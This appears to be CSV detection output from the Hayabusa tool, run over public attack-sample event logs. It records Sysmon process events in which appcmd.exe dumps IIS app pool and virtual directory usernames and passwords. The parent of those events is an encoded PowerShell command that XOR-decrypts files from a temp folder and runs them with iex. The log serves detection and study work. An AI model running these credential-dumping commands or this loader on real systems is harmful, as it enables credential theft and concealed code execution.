0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3196 | PGUID: 365ABB72-3D6D-5CEB-0000-00108C7FFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:18.041 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2472 | PGUID: 365ABB72-3D6E-5CEB-0000-00104C83FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:18.121 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2896 | PGUID: 365ABB72-3D6E-5CEB-0000-00100C87FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:18.202 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA
9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2524 | PGUID: 365ABB72-3D6E-5CEB-0000-0010CC8AFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:18.282 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3144 | PGUID: 365ABB72-3D6E-5CEB-0000-00108C8EFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:18.352 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3100 | PGUID: 365ABB72-3D6E-5CEB-0000-00104C92FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:18.432 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3136 | PGUID: 
365ABB72-3D6E-5CEB-0000-00100C96FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:18.522 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 344 | PGUID: 365ABB72-3D6E-5CEB-0000-0010CC99FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:18.662 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". )"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3756 | PGUID: 365ABB72-3D6E-5CEB-0000-0010EF9EFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:18.742 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". 
)"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3812 | PGUID: 365ABB72-3D6E-5CEB-0000-0010AFA2FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:18.822 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:vdir.name | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 1876 | PGUID: 365ABB72-3D6E-5CEB-0000-00106FA6FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:18.893 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3304 | PGUID: 365ABB72-3D6E-5CEB-0000-00102FAAFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:18.973 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:password | Process: 
C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2276 | PGUID: 365ABB72-3D6E-5CEB-0000-0010EFADFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:19.063 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 1508 | PGUID: 365ABB72-3D6F-5CEB-0000-0010A6B1FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:19.143 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2796 | PGUID: 365ABB72-3D6F-5CEB-0000-001066B5FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:19.233 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: 
""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbA
BlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 1036 | PGUID: 365ABB72-3D6F-5CEB-0000-001026B9FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:19.323 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA